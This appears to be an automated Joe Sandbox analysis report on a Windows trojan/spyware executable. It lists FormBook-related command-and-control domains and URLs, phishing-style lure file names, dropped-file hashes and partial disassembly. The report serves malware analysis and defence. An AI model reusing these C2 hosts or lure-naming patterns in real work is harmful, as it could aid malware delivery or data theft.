154.88.22.101 | www.t91rl7.pro | Seychelles | 40065 | CNSERVERSUS | false
54.244.188.177 | pywolwnvd.biz | United States | 16509 | AMAZON-02US | false
23.225.160.132 | r0lqcud7.nbnnn.xyz | United States | 40065 | CNSERVERSUS | false
104.21.95.160 | www.vayui.top | United States | 13335 | CLOUDFLARENETUS | false
18.141.10.107 | ssbzmoy.biz | United States | 16509 | AMAZON-02US | false
85.159.66.93 | natroredirect.natrocdn.com | Turkey | 34619 | CIZGITR | false
Joe Sandbox version: 42.0.0 Malachite
Analysis ID: 1588634
Start date and time: 2025-01-11 03:28:01 +01:00
Joe Sandbox product: CloudBasic
Overall analysis duration: 0h 11m 59s
Hypervisor based Inspection enabled: false
Report type: full
Cookbook file name: default.jbs
Analysis system description: Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of new started processes analysed: 11
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 2
Technologies:
• HCA enabled
• EGA enabled
• AMSI enabled
Analysis Mode: default
Sample name: 1SxKeB4u0c.exe (renamed because the original name is a hash value)
Original Sample Name: 00bbacda5ecf2d79323ffbc8da4cec8894f657b1208c959d6c7af4c4e0a63539.exe
Detection: MAL
Classification: mal100.spre.troj.spyw.evad.winEXE@9/7@17/10
EGA Information:
• Successful, ratio: 75%
HCA Information:
• Successful, ratio: 78%
• Number of executed functions: 59
• Number of non-executed functions: 251
Cookbook Comments:
• Found application associated with file extension: .exe
• Override analysis time to 240000 for current running targets taking high CPU consumption
• Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, SIHClient.exe, conhost.exe
• Excluded IPs from analysis (whitelisted): 20.12.23.50
• Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
• Not all processes were analyzed; the report is missing behavior information
• Report creation exceeded the maximum time and may be missing disassembly code information
• Report size exceeded the maximum capacity and may be missing disassembly code
Time | Type | Description
21:29:00 | API Interceptor | 1x Sleep call for process: 1SxKeB4u0c.exe modified
21:29:59 | API Interceptor | 10776276x Sleep call for process: bitsadmin.exe modified
Match | Associated Sample Name / URL | Detection | Threat Name | Context
149.88.81.190 | suBpo1g13Q.exe | malicious | FormBook | www.xcvbj.asia/hkgx/
149.88.81.190 | uG3I84bQEr.exe | malicious | FormBook | www.xcvbj.asia/rq1s/
149.88.81.190 | PO 4110007694.exe | malicious | FormBook | www.xcvbj.asia/rq1s/
149.88.81.190 | Latest advice payment.exe | malicious | FormBook | www.xcvbj.asia/rq1s/
149.88.81.190 | Document_084462.scr.exe | malicious | FormBook, GuLoader | www.xcvbj.asia/hkgx/?2O=wgVoJ8uM9T0/Zez11uxn+VRLTSqblAamGOKD8PxxFFLfP5o8U05sZY2pknTlSn+/tcq1eo8k+yVAgRwnrxxUqTNM4+b8NMxfCgVpsHr1kyIADa2UTEjwUtE=&ChhG6=J-xs
149.88.81.190 | Proforma invoice - Arancia NZ.exe | malicious | FormBook | www.xcvbj.asia/hkgx/
149.88.81.190 | OUTSTANDING BALANCE PAYMENT.exe | malicious | FormBook | www.xcvbj.asia/rq1s/
149.88.81.190 | OUTSTANDING BALANCE PAYMENT.exe | malicious | FormBook | www.xcvbj.asia/rq1s/
149.88.81.190 | PAYROLL LIST.exe | malicious | FormBook | www.xcvbj.asia/hkgx/
149.88.81.190 | purchase Order.exe | malicious | FormBook | www.xcvbj.asia/rq1s/
161.97.142.144 | gKvjKMCUfq.exe | malicious | FormBook | www.nb-shenshi.buzz/mz7t/
161.97.142.144 | SC_TR11670000_pdf.exe | malicious | FormBook | www.030002059.xyz/er88/
161.97.142.144 | RFQ3978 39793980.pdf.exe | malicious | FormBook | www.030002350.xyz/1a7n/
161.97.142.144 | SHIPPING DOCUMENTS_PDF.exe | malicious | FormBook | www.070001813.xyz/gn0y/
161.97.142.144 | PO2412010.exe | malicious | FormBook | www.070002018.xyz/6m2n/
161.97.142.144 | New Purchase Order.exe | malicious | FormBook | www.070001325.xyz/gebt/?INvlf=vv4Z5oAEVW8Fnw5+v3rC78A1apnlABoa7eW6m5kMXrJjwDKHwLvNIdd6hCLbwWC7cjqqbjXxYb26MUHQV2edmwlqePdZlnBGcJVL9hTasAQSXzj69w==&afo=JnyH0Z2
161.97.142.144 | Quotation Validity.exe | malicious | FormBook, PureLog Stealer | www.070002018.xyz/6m2n/
161.97.142.144 | Order MEI PO IM202411484.exe | malicious | FormBook | www.030002613.xyz/xd9h/
161.97.142.144 | Documents.exe | malicious | FormBook, PureLog Stealer | www.030002449.xyz/cfqm/
161.97.142.144 | PAYMENT_TO_NFTC_(CUB)_26-11-24.doc | malicious | DarkTortilla, FormBook | www.070001955.xyz/7zj0/
Match | Associated Sample Name / URL | Detection | Threat Name | Context
www.amayavp.xyz | SRT68.exe | malicious | FormBook | 185.27.134.144
www.amayavp.xyz | PO 4110007694.exe | malicious | FormBook | 185.27.134.144
www.amayavp.xyz | Latest advice payment.exe | malicious | FormBook | 185.27.134.144
www.amayavp.xyz | Order MEI PO IM202411484.exe | malicious | FormBook | 185.27.134.144
www.amayavp.xyz | OUTSTANDING BALANCE PAYMENT.exe | malicious | FormBook | 185.27.134.144
www.amayavp.xyz | OUTSTANDING BALANCE PAYMENT.exe | malicious | FormBook | 185.27.134.144
www.amayavp.xyz | IETC-24017.exe | malicious | FormBook, PureLog Stealer | 185.27.134.144
www.amayavp.xyz | purchase Order.exe | malicious | FormBook | 185.27.134.144
www.amayavp.xyz | DOC_114542366.vbe | malicious | FormBook | 185.27.134.144
www.amayavp.xyz | RFQ 3100185 MAHAD.exe | malicious | FormBook | 185.27.134.144
www.vayui.top | RFQ3978 39793980.pdf.exe | malicious | FormBook | 104.21.95.160
www.vayui.top | RFQ_P.O.1212024.scr | malicious | FormBook | 172.67.145.234
www.vayui.top | NEW.RFQ00876.pdf.exe | malicious | FormBook | 172.67.145.234
www.vayui.top | ek8LkB2Cgo.exe | malicious | FormBook | 172.67.145.234
www.vayui.top | PO 4110007694.exe | malicious | FormBook | 104.21.95.160
www.vayui.top | Latest advice payment.exe | malicious | FormBook | 172.67.145.234
www.vayui.top | ZAMOWIEN.BAT.exe | malicious | FormBook, GuLoader | 172.67.145.234
www.vayui.top | OUTSTANDING BALANCE PAYMENT.exe | malicious | FormBook | 104.21.95.160
www.vayui.top | OUTSTANDING BALANCE PAYMENT.exe | malicious | FormBook | 172.67.145.234
www.vayui.top | ZAMOWIEN.BAT.exe | malicious | FormBook, GuLoader | 172.67.145.234
ssbzmoy.biz | BzK8rQh2O3.exe | malicious | FormBook | 18.141.10.107
ssbzmoy.biz | uG3I84bQEr.exe | malicious | FormBook | 18.141.10.107
ssbzmoy.biz | LiuUGJK9vH.exe | malicious | FormBook | 18.141.10.107
ssbzmoy.biz | UaOJAOMxcU.exe | malicious | FormBook | 18.141.10.107
ssbzmoy.biz | SABXJ1B5c8.exe | malicious | MassLogger RAT | 18.141.10.107
ssbzmoy.biz | I3LPkQh2an.exe | malicious | FormBook | 18.141.10.107
ssbzmoy.biz | OVZizpEU7Q.exe | malicious | FormBook | 18.141.10.107
ssbzmoy.biz | RJKUWSGxej.exe | malicious | AgentTesla, RedLine | 18.141.10.107
ssbzmoy.biz | PO_2024_056209_MQ04865_ENQ_1045.exe | malicious | MassLogger RAT, PureLog Stealer | 18.141.10.107
ssbzmoy.biz | REQUEST FOR QUOTATION 1307-RFQ.exe | malicious | MassLogger RAT | 18.141.10.107
Match | Associated Sample Name / URL | Detection | Threat Name | Context
CLOUDFLARENETUS | AJ5zYYsisA.exe | malicious | Unknown | 188.114.96.3
CLOUDFLARENETUS | suBpo1g13Q.exe | malicious | FormBook | 188.114.97.3
CLOUDFLARENETUS | 4NG0guPiKA.exe | malicious | GuLoader, MassLogger RAT | 104.21.80.1
CLOUDFLARENETUS | n0nsAzvYNd.exe | malicious | PureLog Stealer, Snake Keylogger, VIP Keylogger | 104.21.80.1
CLOUDFLARENETUS | njVvgA8pEB.exe | malicious | MassLogger RAT, PureLog Stealer | 104.21.16.1
CLOUDFLARENETUS | AxKxwW9WGa.exe | malicious | FormBook | 172.67.186.192
CLOUDFLARENETUS | k9OEsV37GE.exe | malicious | FormBook | 104.21.96.1
CLOUDFLARENETUS | rwlPT9YJt0.exe | malicious | Snake Keylogger | 104.21.80.1
CLOUDFLARENETUS | YDg44STseR.exe | malicious | Snake Keylogger, VIP Keylogger | 104.21.112.1
CLOUDFLARENETUS | ZoRLXzC5qF.exe | malicious | GuLoader, Snake Keylogger, VIP Keylogger | 104.21.16.1
SAIC-ASUS | suBpo1g13Q.exe | malicious | FormBook | 149.88.81.190
SAIC-ASUS | uG3I84bQEr.exe | malicious | FormBook | 149.88.81.190
SAIC-ASUS | Fantazy.x86.elf | malicious | Unknown | 149.88.225.249
SAIC-ASUS | momo.arm7.elf | malicious | Mirai | 149.65.180.173
SAIC-ASUS | xd.ppc.elf | malicious | Mirai | 149.88.70.60
SAIC-ASUS | xd.mpsl.elf | malicious | Mirai | 149.112.181.228
SAIC-ASUS | nklsh4.elf | malicious | Unknown | 149.88.70.11
SAIC-ASUS | loligang.mpsl.elf | malicious | Mirai | 149.65.132.204
SAIC-ASUS | m68k.elf | malicious | Mirai, Moobot | 149.64.118.107
SAIC-ASUS | nshsh4.elf | malicious | Mirai | 149.118.255.217
CONTABODE | uG3I84bQEr.exe | malicious | FormBook | 161.97.142.144
CONTABODE | 5CTbduoXq4.exe | malicious | FormBook | 161.97.142.144
CONTABODE | 0Wu31IhwGO.exe | malicious | FormBook | 161.97.142.144
CONTABODE | gKvjKMCUfq.exe | malicious | FormBook | 161.97.142.144
CONTABODE | https://eu2.contabostorage.com/69e36f1a5de941bb877627f90e79fd6d:gip/document.html#phishme@arrowbank.com | malicious | HTMLPhisher | 173.249.62.84
CONTABODE | https://eu2.contabostorage.com/69e36f1a5de941bb877627f90e79fd6d:gip/document.html#phishme@arrowbank.com | malicious | HTMLPhisher | 173.249.62.84
CONTABODE | 4sfN3Gx1vO.exe | malicious | FormBook | 161.97.142.144
CONTABODE | 82eqjqLrzE.exe | malicious | AsyncRAT | 144.91.79.54
CONTABODE | DF2.exe | malicious | Unknown | 173.249.2.110
CONTABODE | Electrum-bch-4.4.2-x86_64.AppImage.elf | malicious | Unknown | 173.249.11.35
                                                                            No context
                                                                            No context
                                                                            Process:C:\Users\user\Desktop\1SxKeB4u0c.exe
                                                                            File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                            Category:dropped
                                                                            Size (bytes):1658880
                                                                            Entropy (8bit):4.312987868526287
                                                                            Encrypted:false
                                                                            SSDEEP:24576:KxGBcmlTVg9N9JMlDlfjRiVuVsWt5MJMs:CGy+BgFIDRRAubt5M
                                                                            MD5:C14356FC1BFD5700FA1D54D53D65507C
                                                                            SHA1:6C80ECAE6FBD0EE237336AB992F9855DD7A16075
                                                                            SHA-256:C0794E405B5086347FFA17D93ED4FB62E27D79767054BCAE2C459437E531ED50
                                                                            SHA-512:1D17AF89B1375AF4064C979FD4A0E15CFCDE7DFC0FCA5538797246D5349252E5DC389FA832F5F60842254D6B423FEF70EC54E603AD20DFD7AD4AB66955182A61
                                                                            Malicious:true
                                                                            Antivirus:
                                                                            • Antivirus: Avira, Detection: 100%
                                                                            • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                            Reputation:low
                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........]...3...3...3...0...3...6.h.3.,.7...3.,.0...3.,.6...3...7...3...2...3...2.G.3.e.:...3.e....3.....3.e.1...3.Rich..3.................PE..L...}..d..........................................@..................................V......................................`D......................................@...p...........................p...@....................B.......................text.............................. ..`.rdata..t...........................@..@.data........`.......@..............@....didat..4............N..............@....rsrc................P..............@..@.reloc...............`..............@...........................................................................................................................................................................................................................................................
                                                                            Process:C:\Users\user\Desktop\1SxKeB4u0c.exe
                                                                            File Type:data
                                                                            Category:dropped
                                                                            Size (bytes):289280
                                                                            Entropy (8bit):7.990815558065423
                                                                            Encrypted:true
                                                                            SSDEEP:6144:LyyE0YSn2Y9KOggTibSivh0Tlpa/Ihx89xi4OP4J/zt2HB:uyE0YSn593FiKLyc89xi4OPi/mB
                                                                            MD5:33773A7150E62D4818A793C6EF824980
                                                                            SHA1:AA8395F17DF2C31407B30FEBCCF07E4556C8D3C3
                                                                            SHA-256:98906E70EE67577ADF9E6A01BED48DD87E9264A480975E25B2EF52EE3F40E5EB
                                                                            SHA-512:DF2AFE2FEC427825C22F41A3470DA704C8160CB179284DC530700A8C32E5943D1BB8D6810AAF351D974410B821E236C8F8008AD0A2D17DCA5E16857BC9121510
                                                                            Malicious:false
                                                                            Reputation:low
                                                                            Preview:...PSKBZ2ANA..PK.Z6ANAYP.KBZ6ANAYPPKBZ6ANAYPPKBZ6ANAYPPKBZ6A.AYP^T.T6.G.x.Q..{b)'2y "$%(W,n"8>>$6zT$n3,>p",zr..a4?4.lW;KjAYPPKBZO@G.d07..:Q.s!>.J...!).C...~:Q.T..l+%.d(-)d07.BZ6ANAYP..BZz@OA.&..BZ6ANAYP.K@[=@EAY.TKBZ6ANAYP._BZ6QNAY TKBZvANQYPPIBZ0ANAYPPKDZ6ANAYPP;FZ6CNAYPPK@Zv.NAIPP[BZ6A^AY@PKBZ6A^AYPPKBZ6ANAYPPKBZ6ANAYPPKBZ6ANAYPPKBZ6ANAYPPKBZ6ANAYPPKBZ6ANAYPPKBZ6ANAYPPKBZ6ANAYPPKBZ6ANAYPPKBZ6ANAYPPKBZ6ANAYPPKBZ6ANAYPPKBZ6ANAw$536Z6A:.]PP[BZ6.JAY@PKBZ6ANAYPPKBZ.AN!YPPKBZ6ANAYPPKBZ6ANAYPPKBZ6ANAYPPKBZ6ANAYPPKBZ6ANAYPPKBZ6ANAYPPKBZ6ANAYPPKBZ6ANAYPPKBZ6ANAYPPKBZ6ANAYPPKBZ6ANAYPPKBZ6ANAYPPKBZ6ANAYPPKBZ6ANAYPPKBZ6ANAYPPKBZ6ANAYPPKBZ6ANAYPPKBZ6ANAYPPKBZ6ANAYPPKBZ6ANAYPPKBZ6ANAYPPKBZ6ANAYPPKBZ6ANAYPPKBZ6ANAYPPKBZ6ANAYPPKBZ6ANAYPPKBZ6ANAYPPKBZ6ANAYPPKBZ6ANAYPPKBZ6ANAYPPKBZ6ANAYPPKBZ6ANAYPPKBZ6ANAYPPKBZ6ANAYPPKBZ6ANAYPPKBZ6ANAYPPKBZ6ANAYPPKBZ6ANAYPPKBZ6ANAYPPKBZ6ANAYPPKBZ6ANAYPPKBZ6ANAYPPKBZ6ANAYPPKBZ6ANAYPPKBZ6ANAYPPKBZ6ANAYPPKBZ6ANAYPPKBZ6ANAYPPKBZ6ANAYPPKBZ6ANAYPPKBZ6ANAYPPKBZ6ANAYPPKBZ6A
                                                                            Process:C:\Users\user\Desktop\1SxKeB4u0c.exe
                                                                            File Type:data
                                                                            Category:dropped
                                                                            Size (bytes):289280
                                                                            Entropy (8bit):7.990815558065423
                                                                            Encrypted:true
                                                                            SSDEEP:6144:LyyE0YSn2Y9KOggTibSivh0Tlpa/Ihx89xi4OP4J/zt2HB:uyE0YSn593FiKLyc89xi4OPi/mB
                                                                            MD5:33773A7150E62D4818A793C6EF824980
                                                                            SHA1:AA8395F17DF2C31407B30FEBCCF07E4556C8D3C3
                                                                            SHA-256:98906E70EE67577ADF9E6A01BED48DD87E9264A480975E25B2EF52EE3F40E5EB
                                                                            SHA-512:DF2AFE2FEC427825C22F41A3470DA704C8160CB179284DC530700A8C32E5943D1BB8D6810AAF351D974410B821E236C8F8008AD0A2D17DCA5E16857BC9121510
                                                                            Malicious:false
                                                                            Reputation:low
                                                                            Preview:...PSKBZ2ANA..PK.Z6ANAYP.KBZ6ANAYPPKBZ6ANAYPPKBZ6ANAYPPKBZ6A.AYP^T.T6.G.x.Q..{b)'2y "$%(W,n"8>>$6zT$n3,>p",zr..a4?4.lW;KjAYPPKBZO@G.d07..:Q.s!>.J...!).C...~:Q.T..l+%.d(-)d07.BZ6ANAYP..BZz@OA.&..BZ6ANAYP.K@[=@EAY.TKBZ6ANAYP._BZ6QNAY TKBZvANQYPPIBZ0ANAYPPKDZ6ANAYPP;FZ6CNAYPPK@Zv.NAIPP[BZ6A^AY@PKBZ6A^AYPPKBZ6ANAYPPKBZ6ANAYPPKBZ6ANAYPPKBZ6ANAYPPKBZ6ANAYPPKBZ6ANAYPPKBZ6ANAYPPKBZ6ANAYPPKBZ6ANAYPPKBZ6ANAYPPKBZ6ANAYPPKBZ6ANAYPPKBZ6ANAw$536Z6A:.]PP[BZ6.JAY@PKBZ6ANAYPPKBZ.AN!YPPKBZ6ANAYPPKBZ6ANAYPPKBZ6ANAYPPKBZ6ANAYPPKBZ6ANAYPPKBZ6ANAYPPKBZ6ANAYPPKBZ6ANAYPPKBZ6ANAYPPKBZ6ANAYPPKBZ6ANAYPPKBZ6ANAYPPKBZ6ANAYPPKBZ6ANAYPPKBZ6ANAYPPKBZ6ANAYPPKBZ6ANAYPPKBZ6ANAYPPKBZ6ANAYPPKBZ6ANAYPPKBZ6ANAYPPKBZ6ANAYPPKBZ6ANAYPPKBZ6ANAYPPKBZ6ANAYPPKBZ6ANAYPPKBZ6ANAYPPKBZ6ANAYPPKBZ6ANAYPPKBZ6ANAYPPKBZ6ANAYPPKBZ6ANAYPPKBZ6ANAYPPKBZ6ANAYPPKBZ6ANAYPPKBZ6ANAYPPKBZ6ANAYPPKBZ6ANAYPPKBZ6ANAYPPKBZ6ANAYPPKBZ6ANAYPPKBZ6ANAYPPKBZ6ANAYPPKBZ6ANAYPPKBZ6ANAYPPKBZ6ANAYPPKBZ6ANAYPPKBZ6ANAYPPKBZ6ANAYPPKBZ6ANAYPPKBZ6ANAYPPKBZ6ANAYPPKBZ6A
                                                                            Process:C:\Windows\SysWOW64\bitsadmin.exe
                                                                            File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 7, database pages 89, cookie 0x36, schema 4, UTF-8, version-valid-for 7
                                                                            Category:dropped
                                                                            Size (bytes):196608
                                                                            Entropy (8bit):1.1209886597424439
                                                                            Encrypted:false
                                                                            SSDEEP:192:r2qAdB9TbTbuDDsnxCkvSAE+WslKOMq+8QbnVcxjONC4Je5Q:r2qOB1nxCkvSAELyKOMq+8QTQKC+
                                                                            MD5:EFD26666EAE0E87B32082FF52F9F4C5E
                                                                            SHA1:603BFE6A7D6C0EC4B8BA1D38AEA6EFADDC42B5E0
                                                                            SHA-256:67D4CAA4255418EB18873F01597D1F4257C4146D1DCED78E26D5FD76B783F416
                                                                            SHA-512:28ADD7B8D88795F191567FD029E9F8BC9AEF7584CE3CD56DB40BBA52BC8335F2D8E53A5CE44C153C13A31FD0BE1D76D1E558A4AA5987D5456C000C4D64F08EAA
                                                                            Malicious:false
                                                                            Reputation:moderate, very likely benign file
                                                                            Preview:SQLite format 3......@ .......Y...........6......................................................j............W........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                            Process:C:\Users\user\Desktop\1SxKeB4u0c.exe
                                                                            File Type:data
                                                                            Category:dropped
                                                                            Size (bytes):12320
                                                                            Entropy (8bit):7.9840848199381735
                                                                            Encrypted:false
                                                                            SSDEEP:384:MofiAZfvMf9ANF2kvUBNdyGR5y7LZ8b3Lv:MQZf89uFopyGR5yfZ83v
                                                                            MD5:6DEFD64219DA9CB13EB36747F8B19B64
                                                                            SHA1:BC9BDA0CBE51E64290A74CFF2B8ADE49939B9372
                                                                            SHA-256:3AC031232850EA16FAAEBDAA2A6B6B3BDC8F50AEE86C4726F249C139D5484167
                                                                            SHA-512:D39B50029151F1648C62A7B1565784CCBA1741D0B62D706EA836A5BC41D1284D8FB5717D121445BCB7B16DD67A2AE495A74C185FC8D8834DB94ED81BC23A0163
                                                                            Malicious:false
                                                                            Preview:%..T...............<x.I.....K.wJ.(`...it,.J.>Yy.X{...{.H=~....}..|......7K...2..4.PMJ*Zm[.....D$..g..:.O$...pGSw....I?..,!.6..vh..G..............%f.-......g. ..%....mJ|..q.j.k!.t..O.e#.F82..].i...>.#.VW...|-.Q.^..."..>.4.....l...p.T~......t<...N....6.4...+....V..x..1.!.xO$..C....'.8..H..+XR@.+m..GAod.A...eM...O.ocd....)..Y.=H...L.bjv...6.3\...;...+........q.I.P........9..y=e....Z.TNb....G..@..R.}......D...a.58.u..t9ae)G....-.m.....\.%.t.zqy......o....v.{..7..h[..eb?.$.L.q.47^.%..*.........zL-..`...;....4...~Ch.......n.R7.[!..lS.....(..< .......<.E.6i2V.O<..p..x.ve..V.D....t...(...j..7.Rr..)..*<.V...)5.&xW..M..P!7F...p-..gU..U-B...O..{>.!..%.j.<......R|.d$.]s.r.B.`!g..>G>.!._b.$~.Q..W....\.SHs....D;*.D.~Zw........J".....l..Y.....c....)X.W..%.^.x..).dJ..H.Wyo..M......-.x.Q.u..?.c.K..........Z..kn..-..D^..u$2k^z9(.C.O........4.>'.. ..k...X.............qg4..s.C.d...[H...B.K.Y[7....8.;!Wo3.93......UU...H..-.6.mN....M..V.._..j<...J.........Bh.
                                                                            Process:C:\Users\user\Desktop\1SxKeB4u0c.exe
                                                                            File Type:PE32+ executable (console) x86-64, for MS Windows
                                                                            Category:modified
                                                                            Size (bytes):1348608
                                                                            Entropy (8bit):7.251557857708924
                                                                            Encrypted:false
                                                                            SSDEEP:24576:zQW4qoNUgslKNX0Ip0MgHCpoMBOueVg9N9JMlDlfjRiVuVsWt5MJMs:zQW9BKNX0IPgiKMBOuagFIDRRAubt5M
                                                                            MD5:3A9B5C284795534B55AC6281B165C4ED
                                                                            SHA1:FA98F2D4F53AC2564DB36289ED5072CC5EFCF23D
                                                                            SHA-256:2253ECDD223906BF99A2241F02C6551D7EAEE62BDF15EA314B301EE27C54B458
                                                                            SHA-512:B35DF68DEBE47688ECCB5F060815658E72C7E575E67CDEBD3A60A027D165A8DE6E935DD864AC8E688FE5FF823A32C32E69756251C46852E8C6D4A43512804995
                                                                            Malicious:true
                                                                            Antivirus:
                                                                            • Antivirus: Avira, Detection: 100%
                                                                            • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......g..=#p.n#p.n#p.n*.kn%p.n7..o(p.n7..o p.n7..o.p.n#p.n.u.n7..o.p.n7..o.p.n7..n"p.n7..n"p.n7..o"p.nRich#p.n........................PE..d....4............"..........$.......K.........@.......................................... .......... .......................................j..h....`...a... ...:..................0a..T....................%..(....$...............%..P............................text...L........................... ..`.rdata..............................@..@.data....z.......n..................@....pdata...:... ...<..................@..@.rsrc....a...`...b...2..............@..@.reloc..............................@...................................................................................................................................................................................................................................................
                                                                            Process:C:\Users\user\Desktop\1SxKeB4u0c.exe
                                                                            File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                            Category:dropped
                                                                            Size (bytes):1594368
                                                                            Entropy (8bit):4.175673465116363
                                                                            Encrypted:false
                                                                            SSDEEP:12288:hEP3RFgV3VfCfHcqNS0zKepmlDlpVfjp8EizX+AuV27snt5odJMs:SFMVg9N9JMlDlfjRiVuVsWt5MJMs
                                                                            MD5:212514466AE3CEB072CE28C89C73B2D2
                                                                            SHA1:9691BB45FFA687ED75668B5E1E67EDF91DFBDD57
                                                                            SHA-256:67BDB5F06697D60D7C4AEE5A1F439B0A35C542FDF42F72B444F6FC1ED170C36D
                                                                            SHA-512:C35DE7DD51F635DDF8822AEB22D9DC2B9D5A2843681AA5C55C7F180B3CA1FB3EA9CB657F416CFE609CB53347CB6870E90D2B563915317004346C56B2DE9F8F46
                                                                            Malicious:true
                                                                            Antivirus:
                                                                            • Antivirus: Avira, Detection: 100%
                                                                            • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........,..dB.dB.dB....dB..A.dB..F.dB.dC.,dB..C.dB..G.dB..J.dB....dB..@.dB.Rich.dB.........PE..d...E.~..........."............................@...................................."..... .......... ......................................`E...............p.. ................... ...T...............................................8...TA.......................text............................... ..`.rdata..rV.......X..................@..@.data........`.......@..............@....pdata.. ....p.......D..............@..@.didat...............R..............@....rsrc............ ...T..............@..@.reloc...............t..............@...................................................................................................................................................................................................................................
                                                                            File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                            Entropy (8bit):7.519156787078324
                                                                            TrID:
                                                                            • Win32 Executable (generic) a (10002005/4) 99.96%
                                                                            • Generic Win/DOS Executable (2004/3) 0.02%
                                                                            • DOS Executable Generic (2002/1) 0.02%
                                                                            • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                            File name:1SxKeB4u0c.exe
                                                                            File size:1'794'048 bytes
                                                                            MD5:897ff2a936f11b8f74f56e0c835a2c43
                                                                            SHA1:9d55cead9cdcd487df37b4264f4a2483f19c8184
                                                                            SHA256:00bbacda5ecf2d79323ffbc8da4cec8894f657b1208c959d6c7af4c4e0a63539
                                                                            SHA512:eea47407e00dca3d8ea1c8bd1d6b375c0c1ed1a09be7e1bceecd1b61785f1c56ed6d947ffa27bad846a205bed79a329552b8aa1b24b518ab21f5b9551358afc9
                                                                            SSDEEP:49152:G20c++OCvkGs9Fa/IZ1g7yiu9SLYZgFIDRRAubt5M:ZB3vkJ9z1g7yx9ivUf
                                                                            TLSH:CA85E02273DDC360CB669173FF2AB7016E7B3C614630B95B2F940D7DA960162262D7A3
                                                                            File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......6...r}..r}..r}..4,".p}......s}.../..A}.../#..}.../".G}..{.@.{}..{.P.W}..r}..R.....)."}......s}.../..s}..r}T.s}......s}..Richr}.
                                                                            Icon Hash:aaf3e3e3938382a0
                                                                            Entrypoint:0x427dcd
                                                                            Entrypoint Section:.text
                                                                            Digitally signed:false
                                                                            Imagebase:0x400000
                                                                            Subsystem:windows gui
                                                                            Image File Characteristics:EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
                                                                            DLL Characteristics:TERMINAL_SERVER_AWARE
                                                                            Time Stamp:0x674F9130 [Tue Dec 3 23:16:00 2024 UTC]
                                                                            TLS Callbacks:
                                                                            CLR (.Net) Version:
                                                                            OS Version Major:5
                                                                            OS Version Minor:1
                                                                            File Version Major:5
                                                                            File Version Minor:1
                                                                            Subsystem Version Major:5
                                                                            Subsystem Version Minor:1
                                                                            Import Hash:afcdf79be1557326c854b6e20cb900a7
                                                                            Instruction
                                                                            call 00007FA8D172BDAAh
                                                                            jmp 00007FA8D171EB74h
                                                                            int3
                                                                            int3
                                                                            int3
                                                                            int3
                                                                            int3
                                                                            int3
                                                                            int3
                                                                            int3
                                                                            int3
                                                                            push edi
                                                                            push esi
                                                                            mov esi, dword ptr [esp+10h]
                                                                            mov ecx, dword ptr [esp+14h]
                                                                            mov edi, dword ptr [esp+0Ch]
                                                                            mov eax, ecx
                                                                            mov edx, ecx
                                                                            add eax, esi
                                                                            cmp edi, esi
                                                                            jbe 00007FA8D171ECFAh
                                                                            cmp edi, eax
                                                                            jc 00007FA8D171F05Eh
                                                                            bt dword ptr [004C31FCh], 01h
                                                                            jnc 00007FA8D171ECF9h
                                                                            rep movsb
                                                                            jmp 00007FA8D171F00Ch
                                                                            cmp ecx, 00000080h
                                                                            jc 00007FA8D171EEC4h
                                                                            mov eax, edi
                                                                            xor eax, esi
                                                                            test eax, 0000000Fh
                                                                            jne 00007FA8D171ED00h
                                                                            bt dword ptr [004BE324h], 01h
                                                                            jc 00007FA8D171F1D0h
                                                                            bt dword ptr [004C31FCh], 00000000h
                                                                            jnc 00007FA8D171EE9Dh
                                                                            test edi, 00000003h
                                                                            jne 00007FA8D171EEAEh
                                                                            test esi, 00000003h
                                                                            jne 00007FA8D171EE8Dh
                                                                            bt edi, 02h
                                                                            jnc 00007FA8D171ECFFh
                                                                            mov eax, dword ptr [esi]
                                                                            sub ecx, 04h
                                                                            lea esi, dword ptr [esi+04h]
                                                                            mov dword ptr [edi], eax
                                                                            lea edi, dword ptr [edi+04h]
                                                                            bt edi, 03h
                                                                            jnc 00007FA8D171ED03h
                                                                            movq xmm1, qword ptr [esi]
                                                                            sub ecx, 08h
                                                                            lea esi, dword ptr [esi+08h]
                                                                            movq qword ptr [edi], xmm1
                                                                            lea edi, dword ptr [edi+08h]
                                                                            test esi, 00000007h
                                                                            je 00007FA8D171ED55h
                                                                            bt esi, 03h
                                                                            jnc 00007FA8D171EDA8h
                                                                            Programming Language:
                                                                            • [ASM] VS2013 build 21005
                                                                            • [ C ] VS2013 build 21005
                                                                            • [C++] VS2013 build 21005
                                                                            • [ C ] VS2008 SP1 build 30729
                                                                            • [IMP] VS2008 SP1 build 30729
                                                                            • [ASM] VS2013 UPD4 build 31101
                                                                            • [RES] VS2013 build 21005
                                                                            • [LNK] VS2013 UPD4 build 31101
Name | Virtual Address | Virtual Size | Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IMPORT | 0xba44c | 0x17c | .rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE | 0xc7000 | 0x5f9e8 | .rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_DEBUG | 0x92bc0 | 0x1c | .rdata
